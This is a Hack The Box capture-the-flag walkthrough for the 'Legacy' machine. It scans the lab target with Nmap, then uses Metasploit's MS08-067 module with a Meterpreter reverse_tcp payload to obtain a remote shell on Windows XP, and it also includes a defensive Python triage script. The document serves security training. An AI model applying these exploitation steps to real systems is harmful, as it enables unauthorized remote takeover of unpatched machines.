3/28/2022

HTB: Legacy

 ___  ___  _________  ________                                    
|\  \|\  \|\___   ___\\   __  \  ___                              
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                             
 \ \   __  \   \ \  \ \ \   __  \|__|                             
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                           
   \ \__\ \__\   \ \__\ \ \_______\|\__\                          
    \|__|\|__|    \|__|  \|_______|\|__|                          
 ___       _______   ________  ________  ________      ___    ___ 
|\  \     |\  ___ \ |\   ____\|\   __  \|\   ____\    |\  \  /  /|
\ \  \    \ \   __/|\ \  \___|\ \  \|\  \ \  \___|    \ \  \/  / /
 \ \  \    \ \  \_|/_\ \  \  __\ \   __  \ \  \        \ \    / / 
  \ \  \____\ \  \_|\ \ \  \|\  \ \  \ \  \ \  \____    \/  /  /  
   \ \_______\ \_______\ \_______\ \__\ \__\ \_______\__/  / /    
    \|_______|\|_______|\|_______|\|__|\|__|\|_______|\___/ /     
                                                     \|___|/         

Hack The Box's Legacy is an Easy machine that features CVE-2008-4250 (MS08-067), a vulnerability first disclosed in 2008 that affected Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems. It allows remote code execution when the target receives a specially crafted RPC request. You can learn more about this vulnerability's CVE details here.

After starting the machine on HTB and connecting to your HTB VPN, we will begin by opening a terminal and pinging the machine's IP address to make sure it is reachable. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.129.141.229

You should receive replies from the IP address. Press CTRL + C to stop sending packets to the target host. Once you have confirmed the host is reachable, it's time to move on to enumeration with Nmap.

Start with a quick service scan using Nmap. We will use the -sC switch to run Nmap's default scripts and the -sV switch to enable version detection on the open ports. You can learn more about Nmap here. Note: I had to use the -Pn flag to skip host discovery in order to get proper scan results. You should see output like the following in your terminal:

nmap -sC -sV -Pn 10.129.141.229
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 21:53 GMT
Nmap scan report for 10.129.141.229
Host is up (0.0043s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h27m38s, deviation: 2h07m16s, median: 4d22h57m38s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:6f:40 (VMware)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-03-29T02:51:07+03:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.51 seconds

On open port 445 we can see that the host is running Windows XP. The Host script results section adds more detail: SMB2 negotiation fails (so the host only speaks SMBv1) and SMB message signing is disabled. I suggest always researching the services found on open ports and their known vulnerabilities with your favorite search engine. After some searching, we find we can exploit this using the MS08-067 Microsoft Server Service Relative Path Stack Corruption Metasploit module.
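As an added example (not part of the original write-up), the following Python triages the Nmap output above from the defender's side: it flags SMB exposure on an OS within MS08-067's scope, disabled SMB signing, and SMBv1-only negotiation, which are the findings a patch or network-isolation ticket would cite. The sample input is a constructed excerpt of the scan shown above, and the function names are my own.

```python
import re

# Constructed sample: the relevant lines of the Nmap scan shown above.
NMAP_OUTPUT = """\
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
"""

# Windows families affected by MS08-067 (CVE-2008-4250), as stated on the page.
MS08_067_OS = ("windows 2000", "windows xp", "windows server 2003")

def parse_open_ports(text):
    """Map open TCP ports to service names from Nmap's port table lines."""
    return {int(m.group(1)): m.group(2)
            for m in re.finditer(r"^(\d+)/tcp\s+open\s+(\S+)", text, re.M)}

def detected_os(text):
    """Pull the OS string from the smb-os-discovery script output."""
    m = re.search(r"^\|\s+OS:\s+(.+)$", text, re.M)
    return m.group(1).strip() if m else ""

def assess_ms08_067_exposure(text):
    """Return human-readable findings that make this host a patch/isolation priority."""
    findings = []
    ports = parse_open_ports(text)
    smb_ports = sorted(p for p in ports if p in (139, 445))
    if smb_ports:
        findings.append("SMB reachable on tcp/%s" % ",".join(map(str, smb_ports)))
    os_name = detected_os(text)
    if any(fam in os_name.lower() for fam in MS08_067_OS):
        findings.append("OS in MS08-067 scope and end-of-life: " + os_name)
    if "message_signing: disabled" in text:
        findings.append("SMB message signing disabled")
    if "Protocol negotiation failed (SMB2)" in text:
        findings.append("SMB2 negotiation failed: host speaks SMBv1 only")
    return findings

def priority(text):
    """'critical' when SMB is exposed on an in-scope OS; 'review' for any other finding."""
    findings = assess_ms08_067_exposure(text)
    if any(f.startswith("SMB reachable") for f in findings) and \
       any(f.startswith("OS in MS08") for f in findings):
        return "critical"
    return "review" if findings else "ok"
```

Run `priority(NMAP_OUTPUT)` against the sample to get "critical"; feeding it a scan with no SMB ports and no in-scope OS returns "ok".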

Open Metasploit in a new terminal by typing "msfconsole".

msfconsole
                                                  

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v6.1.9-dev                           ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View all productivity tips with the 
tips command

msf6 > 

Let's search for the MS08-067 exploit using the "search" command.

msf6 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

Metasploit returns a single matching module, the one we are looking for: exploit/windows/smb/ms08_067_netapi. To load an exploit, type "use" followed by either the module's index number from the search results or its full name.

Once the exploit has loaded, type "options" and hit Enter. This will bring up the exploit's options, which we will need to configure.

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://gi
                                       thub.com/rapid7/metasploit-framewo
                                       rk/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRV
                                       SVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh
                                        , thread, process, none)
   LHOST     157.245.81.12    yes       The listen address (an interface
                                        may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > 

Our RHOSTS option is blank and is required to run the exploit. To set it, type "set RHOSTS" followed by the IP of the target machine and hit Enter. Metasploit confirms the value with a line showing the RHOSTS IP.

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.141.229
RHOSTS => 10.129.141.229
msf6 exploit(windows/smb/ms08_067_netapi) >

Our RPORT is already correctly set to 445. You may need to change the payload options LHOST and LPORT if you are using a VPN, a virtual machine, or the HTB Pwnbox; LHOST must be an address the target can reach back to. Most of the time this is done by entering "set LHOST" followed by your interface name, usually "tun0". With everything set, run the exploit by typing "run" and hitting Enter.

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.51:4444 
[*] 10.129.141.229:445 - Automatically detecting the target...
[*] 10.129.141.229:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.141.229:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.141.229:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.129.141.229
[*] Meterpreter session 1 opened (10.10.14.51:4444 -> 10.129.141.229:1071) at 2022-03-23 22:08:22 +0000

meterpreter > 

We got a Meterpreter session! We can now type "shell" and hit Enter to get a command shell on the target system.

meterpreter > shell
Process 884 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

You can now navigate the target system to obtain the user and root .txt flags, which are located in the user's and the Administrator's Desktop folders.